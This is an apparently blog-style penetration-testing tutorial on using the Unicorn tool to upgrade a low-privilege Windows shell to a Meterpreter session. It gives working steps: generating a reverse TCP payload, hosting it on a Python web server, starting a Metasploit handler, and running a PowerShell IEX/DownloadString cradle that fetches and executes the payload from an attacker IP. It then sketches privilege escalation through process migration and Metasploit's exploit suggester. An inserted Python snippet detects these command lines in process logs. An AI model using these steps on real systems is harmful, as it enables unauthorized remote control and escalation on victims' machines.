Unicorn — Low Priv Shell to Meterpreter Session

Assume you already have a low-privileged shell on a target machine (in my case it's on a vulnerable web server). The goal is to get a Meterpreter shell, then conduct privilege escalation and achieve persistence from there.


What is Unicorn?

Unicorn is a tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. This tool/technique was presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
You can find the tool below.
https://github.com/trustedsec/unicorn
You can find a link to their Defcon 18 presentation below.
https://www.youtube.com/watch?v=q5pA49C7QJg

Step One — Running Unicorn.

In this scenario we will be running Unicorn to create a reverse TCP shell on a Windows host.

The command-line syntax for this tool looks like this: ./unicorn.py <payload> <LHOST> <LPORT>
The result will be two files: unicorn.rc (a Metasploit configuration to quickly spawn a handler) and powershell_attack.txt (an encoded PowerShell command that creates a Meterpreter session back to the handler).

Step Two — Modify the PowerShell attack.

We want to modify the PowerShell attack because we are not going to run it as a script. Instead, we are going to use Invoke-Expression to pull the PowerShell attack from a malicious web server and execute it in memory.

The following is the actual encoded PowerShell command.

powershell_attack.txt
Open a new file in vi (the extension is irrelevant) and copy all the text from powershell_attack.txt.

Paste the content of powershell_attack.txt into the file you just created, attack.txt.

Delete powershell /w 1 /C " from the beginning of the document, and delete the closing " from the end of the document. We won't need this part, as we will be running PowerShell and loading and executing this command from the shell we already have on our victim in this scenario.

Save the document.


Step Three — Create a SimpleHTTPServer on your attacker machine.

Create an HTTP server in the directory that holds your PowerShell payload.

python -m SimpleHTTPServer

Step Four — Create a listener using multi/handler

You can do this one of two ways. You can use the .rc file Unicorn created by running:

msfconsole -r unicorn.rc

This will automatically start your handler in Metasploit. If you have issues with that, you can also set it up manually by running the following:

Setting up a handler in metasploit

Step Five — Use PowerShell to call your malicious PowerShell script on the victim machine.

Use the following command on your low-privileged shell to load and execute the malicious PowerShell payload on the victim machine:

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.29:8000/attack.html')"

Two things will happen here. You will see the victim reaching out to your HTTP server to get the malicious payload. Shortly after, you will see your Meterpreter handler spawn a session when the victim successfully executes the PowerShell command.
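For defenders, the steps above leave recognisable traces in process-creation logs. The following is an added example, not part of the original post: it scores Sysmon Event ID 1 style records for the command-line traits described in steps two and five. The sample records, the rule names and the list of web-server parent processes are constructed assumptions.

```python
import re

# Command-line traits taken from the steps above; rule names are this example's own.
RULES = {
    "download_cradle": re.compile(
        r"(?:\bIEX\b|Invoke-Expression).*Net\.WebClient.*\.DownloadString\(", re.I | re.S),
    "hidden_window_command": re.compile(
        r"powershell(?:\.exe)?[\"']?\s+[/-]w(?:in\w*)?\s+(?:1|hidden)\s+[/-]c", re.I),
    "cleartext_http_fetch": re.compile(r"DownloadString\(\s*['\"]http://", re.I),
}
# Assumed web-server worker processes; adjust to the stack you actually run.
WEB_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(event):
    """Return the sorted rule names that one process-creation event matches."""
    # Strip PowerShell backtick escapes so they cannot split a keyword.
    cmd = event.get("CommandLine", "").replace("`", "")
    hits = [name for name, rx in RULES.items() if rx.search(cmd)]
    # Direct parent only; a cmd.exe hop in between needs process-tree correlation.
    if basename(event.get("Image", "")) in SHELLS and \
            basename(event.get("ParentImage", "")) in WEB_PARENTS:
        hits.append("web_server_spawned_powershell")
    return sorted(hits)

def triage(events):
    """Map event index -> matched rules, skipping events with no match."""
    scored = {i: score_event(e) for i, e in enumerate(events)}
    return {i: hits for i, hits in scored.items() if hits}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records, fields named as in Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell \"IEX(New-Object Net.WebClient)"
                    ".downloadString('http://10.10.14.29:8000/attack.html')\""},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell /w 1 /C "<encoded command elided>"'},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\rotate-logs.ps1"},
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS).items():
        print(index, hits)
```

The same patterns can be applied to Security event 4688 records when command-line auditing is enabled, using that event's own field names.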


From here, ideally you'd do privilege escalation.

An example scenario would be that you have a Meterpreter session.

You run sysinfo and find that you have an x86 Meterpreter shell on an x64 Windows system.

Your next move would be to background this session and use "multi/recon/local_exploit_suggester" on it.

Your next move after that would be to find an x64 process that looks like it will be around for a while and migrate to that process with "migrate <pid>".

You would then use the exploit suggester again. Since the Meterpreter shell now matches the OS architecture, you will get different results.

I would start by using the first exploit the system is vulnerable to that shows up both times you ran the suggester.

Good Luck! Get System/r00t!